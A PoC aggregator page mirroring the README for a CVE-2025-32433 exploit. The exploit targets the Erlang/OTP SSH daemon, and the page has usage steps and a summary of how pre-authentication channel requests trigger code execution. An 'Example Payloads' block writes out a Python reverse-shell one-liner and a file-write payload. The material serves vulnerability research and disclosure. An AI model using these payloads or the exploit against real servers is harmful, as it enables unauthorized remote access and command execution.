CVE-2025-32433 PoC — Erlang/OTP SSH Vulnerable to Pre-Authentication RCE

Source

https://github.com/Mdusmandasthaheer/CVE-2025-32433

Associated Vulnerability

Title:Erlang/OTP SSH Vulnerable to Pre-Authentication RCE (CVE-2025-32433)
Description:Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.

Readme

<h1>CVE-2025-32433 – Erlang/OTP SSH RCE Vulnerability</h1>

<h2>📌 Summary</h2>
<p>
  <strong>CVE-2025-32433</strong> is a <strong>remote code execution (RCE)</strong> vulnerability affecting the Erlang/OTP SSH daemon.
  The root cause is improper handling of <em>pre-authentication</em> SSH channel requests which can be crafted by an attacker to
  cause arbitrary command execution <strong>before authentication</strong>. 
  The included PoC demonstrates sending such crafted SSH packets; by default it writes <code>/lab.txt</code> on the target but can be adapted for other commands.
</p>

<div style="background:#fef2f2; border-left:4px solid #ef4444; padding:10px; border-radius:6px; margin:16px 0;">
  ⚠️ <strong>Disclaimer:</strong> This repository is for <strong>educational and research purposes only</strong>. 
  Do not use against systems without explicit permission.
</div>

<h2>🛠️ Usage</h2>
<ol>
  <li>Edit target details in the PoC script:</li>
</ol>

<pre><code>HOST = "127.0.0.1"  # Target IP
PORT = 2222         # Target SSH port
</code></pre>

<ol start="2">
  <li>Run the exploit:</li>
</ol>

<pre><code>python3 cve-2025-32433.py
</code></pre>

<p>
  By default it creates <code>/lab.txt</code> containing <code>pwned</code>. 
  Modify the payload in <code>build_channel_request</code> to run your own commands.
</p>

<h2>🧩 Example Payloads</h2>
<pre><code># Write a file
file:write_file("/lab.txt", <<"pwned">>).

# Spawn a reverse shell
os:cmd("python3 -c 'import socket,subprocess,os;
s=socket.socket(); s.connect((\"127.0.0.1\",2222));
os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2); import pty; pty.spawn(\"sh\")'")
</code></pre>

<h2>🔧 How the PoC Works (short)</h2>
<ul>
  <li>Connects to the SSH service and exchanges banners.</li>
  <li>Sends a crafted <code>SSH_MSG_KEXINIT</code> to look like a normal handshake.</li>
  <li>Sends <code>SSH_MSG_CHANNEL_OPEN</code> and <code>SSH_MSG_CHANNEL_REQUEST</code> with an <code>exec</code> payload <em>before authentication</em>.</li>
  <li>If vulnerable, the server executes the supplied Erlang command.</li>
</ul>

<h2>🙏 Credits</h2>
<p>
  Discovery and write-up by <strong>Matt Keeley</strong> (Platform Security).  
  Thanks to him for publishing the PoC and sharing details.  
</p>
<p>
  Blog link: <a href="https://platformsecurity.com/blog/CVE-2025-32433-poc" target="_blank">https://platformsecurity.com/blog/CVE-2025-32433-poc</a>
</p>

<h2>📚 References</h2>
<ul>
  <li><a href="https://platformsecurity.com/blog/CVE-2025-32433-poc" target="_blank">Matt Keeley’s blog</a></li>
  <li><a href="https://www.erlang.org/news" target="_blank">Erlang/OTP Security Advisories</a></li>
  <li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32433" target="_blank">MITRE CVE Record</a></li>

File Snapshot


 [4.0K]  /data/pocs/de03ba7e4d9ce80b5d83a7e2ce2d4102b609a62a
├── [4.1K]  exploit.py
└── [2.8K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!